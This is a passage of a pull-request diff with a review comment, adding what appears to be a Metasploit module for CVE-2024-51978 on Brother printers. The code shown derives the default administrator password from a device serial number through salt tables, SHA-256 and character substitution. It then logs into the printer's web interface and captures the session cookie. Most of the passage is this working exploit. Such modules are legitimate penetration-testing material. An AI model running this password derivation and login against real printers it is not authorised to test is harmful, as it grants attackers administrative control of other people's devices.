modules/auxiliary/admin/misc/brother_default_admin_auth_bypass_cve_2024_51978.rb

```diff
@@ -0,0 +1,418 @@
+      salt_table_index = SALT_LOOKUP_TABLE[salt_lookup_index]
+
+      fail_with(Failure::BadConfig, 'unknown salt table data at salt table index') unless SALT_DATA_TABLE[salt_table_index]
+
+      salt_data ||= SALT_DATA_TABLE[salt_table_index].unpack('C*')
+    end
+
+    fail_with(Failure::BadConfig, 'SaltData must be 8 bytes') unless salt_data.length == 8
+
+    vprint_status("Generating default password with salt lookup index #{salt_lookup_index} and salt data #{salt_data.pack('C*')}")
+
+    buff = serial[0..15]
+
+    buff << [
+      salt_data[7] - 1,
+      salt_data[6] - 1,
+      salt_data[5] - 1,
+      salt_data[4] - 1,
+      salt_data[3] - 1,
+      salt_data[2] - 1,
+      salt_data[1] - 1,
+      salt_data[0] - 1
+    ].pack('C*')
+
+    hash = Digest::SHA256.digest(buff)
+
+    hash64 = Base64.strict_encode64(hash)
+
+    result = ''
+
+    0.upto(7) do |idx|
+      c = hash64[idx]
+
+      case c
+      when 'l'
+        result << '#'
+      when 'I'
+        result << '$'
+      when 'z'
+        result << '%'
+      when 'Z'
+        result << '&'
+      when 'b'
+        result << '*'
+      when 'q'
+        result << '-'
+      when 'O'
+        result << ':'
+      when 'o'
+        result << '?'
+      when 'v'
+        result << '@'
+      when 'y'
+        result << '>'
+      else
+        result << c
+      end
+    end
+
+    result
+  end
+
+  def validate_password(password)
+    vprint_status('Attempting to validate password')
+
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(datastore['TARGETURI'], 'general', 'status.html')
+    )
+
+    unless res
+      vprint_error('HTTP GET connection failed')
+      return Metasploit::Model::Login::Status::UNABLE_TO_CONNECT
+    end
+
+    unless res.code == 200
+      vprint_error("Unexpected HTTP GET response code: #{res.code}")
+      return Metasploit::Model::Login::Status::UNABLE_TO_CONNECT
+    end
+
+    unless res.body =~ /input type="password" id="LogBox" name="([a-zA-Z0-9]+)"/
+      vprint_error('Failed to extract login form LogBox name.')
+      return Metasploit::Model::Login::Status::UNABLE_TO_CONNECT
+    end
+
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(datastore['TARGETURI'], 'general', 'status.html'),
+      'ctype' => 'application/x-www-form-urlencoded',
+      'vars_post' => {
+        Regexp.last_match(1) => password,
+        'loginurl' => normalize_uri(datastore['TARGETURI'], 'general', 'status.html')
+      }
+    })
+
+    unless res
+      vprint_error('HTTP POST connection failed')
+      return Metasploit::Model::Login::Status::UNABLE_TO_CONNECT
+    end
+
+    unless res.code == 200 || res.code == 301
+      vprint_error("Unexpected HTTP POST response code: #{res.code}")
+      return Metasploit::Model::Login::Status::UNABLE_TO_CONNECT
+    end
+
+    auth_cookie = res&.get_cookies&.match(%r{AuthCookie=([a-zA-Z0-9%/+=\-\r\n]+);})
```

Comment:
```suggestion
    auth_cookie = res&.get_cookies&.match(%r{AuthCookie=([^;]+);})
```

It's a tad more readable, albeit I'm not sure the regex will match/matched on new lines.